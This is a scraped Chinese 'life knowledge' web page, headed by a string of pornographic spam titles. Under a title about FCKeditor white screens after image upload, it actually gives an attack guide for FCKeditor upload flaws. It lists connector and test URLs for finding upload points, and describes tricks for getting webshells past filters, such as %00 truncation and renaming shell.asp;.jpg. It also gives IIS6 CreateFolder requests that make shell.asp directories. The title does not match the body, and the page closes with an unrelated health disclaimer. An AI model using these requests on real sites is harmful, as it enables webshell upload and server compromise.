亚洲精品久久久久久第一页-人妻少妇精彩视品一区二区三区-91国产自拍免费视频-免费一级a在线播放视频正片-少妇天天日天天射天天爽-国产大屁股喷水视频在线观看-操美女骚穴抽插性爱视频-亚洲 欧美 中文字幕 丝袜-成人免费无码片在线观看

  1. 首頁 > 生活知識 > >

fckeditor上傳圖片后出現(xiàn)白屏的原因 fckeditor上傳圖片后出現(xiàn)白屏

生活百科fckeditor


fckeditor上傳圖片后出現(xiàn)白屏的原因 fckeditor上傳圖片后出現(xiàn)白屏

文章插圖
一. 關(guān)于FCKeditor
FCKeditor是一個網(wǎng)頁文本編輯器,在很多的內(nèi)容管理系統(tǒng)里都有用到
本文簡單介紹通過FCKeditor上傳漏洞進行攻擊的思路,并對可能用到的操作進行整理
二. 攻擊思路
1.查看FCKeditor版本
http://127.0.0.1/fckeditor/editor/dialog/fck_about.html
http://127.0.0.1/FCKeditor/_whatsnew.html
2.測試上傳點
FCKeditor/editor/filemanager/browser/default/connectors/test.html
FCKeditor/editor/filemanager/upload/test.html
FCKeditor/editor/filemanager/connectors/test.html
FCKeditor/editor/filemanager/connectors/uploadtest.html
FCKeditor/_samples/default.html
FCKeditor/_samples/asp/sample01.asp
FCKeditor/_samples/asp/sample02.asp
FCKeditor/_samples/asp/sample03.asp
FCKeditor/_samples/asp/sample04.asp
FCKeditor/_samples/default.html
FCKeditor/editor/fckeditor.htm
FCKeditor/editor/fckdialog.html
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?
Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?
Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?
Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector.jsp?
Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/browser.html?
Type=Image&Connector=http://www.site.com/fckeditor/editor/filemanager/connectors/php/conne
ctor.php
FCKeditor/editor/filemanager/browser/default/browser.html?
Type=Image&Connector=http://www.site.com/fckeditor/editor/filemanager/connectors/asp/conne
ctor.asp
FCKeditor/editor/filemanager/browser/default/browser.html?
Type=Image&Connector=http://www.site.com/fckeditor/editor/filemanager/connectors/aspx/conn
ector.aspx
FCKeditor/editor/filemanager/browser/default/browser.html?
Type=Image&Connector=http://www.site.com/fckeditor/editor/filemanager/connectors/jsp/conne
ctor.jsp
FCKeditor/editor/filemanager/browser/default/browser.html?
type=Image&connector=connectors/asp/connector.asp
FCKeditor/editor/filemanager/browser/default/browser.html?
Type=Image&Connector=connectors/jsp/connector.jsp
fckeditor/editor/filemanager/browser/default/browser.html?
Type=Image&Connector=connectors/aspx/connector.Aspx
fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Con
3.突破限制
3.1 上傳限制
上傳限制的突破方式很多,主要還是抓包改擴展名,%00截斷,添加文件頭等
3.2 文件名限制
3.2.1二次上傳繞過文件名‘ . ’ 修改為‘ _ ’
FCK在上傳了諸如shell.asp;.jpg的文件后,會自動將文件名改為shell_asp;.jpg 。可以繼續(xù)上傳同名
文件,文件名會變?yōu)閟hell.asp;(1).jpg
3.2.2提交shell.php+空格繞過
空格只支持windows系統(tǒng),linux系統(tǒng)是不支持的,可提交shell.php+空格來繞過文件名限制 。
3.3 IIS6.0突破文件夾限制
Fckeditor/editor/filemanager/connectors/asp/connector.asp?
Command=CreateFolder&Type=File&CurrentFolder=/shell.asp&NewFolderName=z.asp
FCKeditor/editor/filemanager/connectors/asp/connector.asp?
Command=CreateFolder&Type=Image&CurrentFolder=/shell.asp&NewFolderName=z&uuid=124478997568
4
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?
Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp


以上關(guān)于本文的內(nèi)容,僅作參考!溫馨提示:如遇健康、疾病相關(guān)的問題,請您及時就醫(yī)或請專業(yè)人士給予相關(guān)指導!

「愛刨根生活網(wǎng)」www.malaban59.cn小編還為您精選了以下內(nèi)容,希望對您有所幫助: